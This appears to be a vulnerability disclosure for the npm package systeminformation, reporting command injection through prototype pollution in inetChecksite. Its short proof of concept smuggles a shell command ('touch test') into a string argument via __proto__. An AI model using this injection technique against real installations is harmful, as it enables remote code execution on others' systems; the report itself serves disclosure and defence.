systeminformation

vulnerability command injection with prototype pollution
severity 8.5
language javascript
registry npm

✍️ Description

with a little trick, attackers can bypass the prototype pollution and inject malcious command into an safety string which can give attackers an RCE.

🕵️‍♂️ Proof of Concept

// PoC.js
const si = require('systeminformation');
const command = "2";
command.__proto__[2] = "233; touch test;//";
si.inetChecksite(command)); // which will execute `touch test;`

💥 Impact

This exploit need to have an prototype pollution attack before, and attackers can use this vulnerability to extend their privileges to RCE.(I am wondering if it is an vulnerability about this package or it's just a sideeffect.

References